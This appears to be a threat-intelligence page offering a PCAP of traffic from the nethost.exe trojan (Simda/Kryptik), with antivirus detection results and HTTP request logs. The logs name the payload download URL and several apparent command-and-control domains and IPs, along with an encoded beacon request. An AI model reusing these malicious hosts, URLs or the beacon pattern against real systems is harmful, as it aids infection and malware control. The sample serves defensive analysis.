
Simda Kryptik PUP Trojan Malware nethost.exe PCAP File download Traffic Sample determineport.ru g.purecontinue.ru

Download Attachments

  • nethost (pcap)
    Date added: January 16, 2017 6:36 am | Added by: admin | File size: 47 KB | Downloads: 116
SHA256: 4b7e44ab5e74b69db9742cc59642538bc39be03977e1c1db8a9ed709130e77ef
File name: nethost.exe
Detection ratio: 15 / 56
Analysis date: 2017-01-16 06:23:30 UTC
Engine                  Detection                                        Update
AhnLab-V3               PUP/Win32.LoadMoney.R193200                      20170115
Avira (no cloud)        TR/Crypt.XPACK.Gen7                              20170115
Baidu                   Win32.Trojan.WisdomEyes.16070401.9500.9892       20170113
CrowdStrike Falcon (ML) malicious_confidence_100% (D)                    20161024
ESET-NOD32              a variant of Win32/Kryptik.COWS                  20170116
Fortinet                W32/Kryptik.COWS!tr                              20170116
Ikarus                  Trojan.Simda                                     20170115
Invincea                virtool.win32.obfuscator.caf!bit                 20170111
K7AntiVirus             Trojan ( 004f58c41 )                             20170115
K7GW                    Trojan ( 004f58c41 )                             20170116
Kaspersky               UDS:DangerousObject.Multi.Generic                20170116
Malwarebytes            Trojan.Dropper                                   20170116
Qihoo-360               Win32/Trojan.cb1                                 20170116
Symantec                Heur.AdvML.B                                     20170115
Tencent                 Win32.Trojan.Kryptik.Htct                        201701

2017-01-15 23:35:58.432477 IP 192.168.1.102.62819 > 193.238.152.150.80: Flags [P.], seq 0:304, ack 1, win 256, length 304: HTTP: GET /nethost.exe HTTP/1.1
GET /nethost.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: qcqwyfknkmhym.boresunlight.top
Connection: Keep-Alive

2017-01-15 23:36:45.534332 IP 192.168.1.102.62823 > 185.14.29.161.80: Flags [P.], seq 4266694692:4266694855, ack 2929581312, win 256, length 163: HTTP: GET /index.htm HTTP/1.1
GET /index.htm HTTP/1.1
User-Agent: Mozilla / 5.0 (Windows NT 6.3; WOW64; Trident / 7.0; rv:11.0) like Gecko
Host: closetpillow931.ru
Connection: Keep-Alive

2017-01-15 23:36:46.183272 IP 192.168.1.102.62824 > 5.9.43.189.80: Flags [P.], seq 1838734449:1838734627, ack 598866226, win 256, length 178: HTTP: GET /index.html?v=3&eh=&ts=0&a= HTTP/1.1
GET /index.html?v=3&eh=&ts=0&a= HTTP/1.1
User-Agent: Mozilla / 5.0 (Windows NT 6.3; WOW64; Trident / 7.0; rv:11.0) like Gecko
Host: determineport.ru
Connection: Keep-Alive

2017-01-15 23:36:46.902193 IP 192.168.1.102.62825 > 185.20.186.51.80: Flags [P.], seq 1918876800:1918877115, ack 3026667545, win 256, length 315: HTTP: GET /1/WxYZBRdRVR5PFkIaA1xaHVJCVEheXUREVVRaXlUNWExQHF5UBV1YSQ0JQgVRTQAeDQJWTBQZUlwEEggPDlIAEwVaBV9VCBBeUV9fWUFVDQ0JQFVfCwoGFFRKCxVRXixbQgcFHhoaUkpMAFUaVxVXUhocEFtdWUJe HTTP/1.1
GET /1/WxYZBRdRVR5PFkIaA1xaHVJCVEheXUREVVRaXlUNWExQHF5UBV1YSQ0JQgVRTQAeDQJWTBQZUlwEEggPDlIAEwVaBV9VCBBeUV9fWUFVDQ0JQFVfCwoGFFRKCxVRXixbQgcFHhoaUkpMAFUaVxVXUhocEFtdWUJe HTTP/1.1
User-Agent: Mozilla / 5.0 (Windows NT 6.3; WOW64; Trident / 7.0; rv:11.0) like Gecko
Host: g.purecontinue.ru
Connection: Keep-Alive
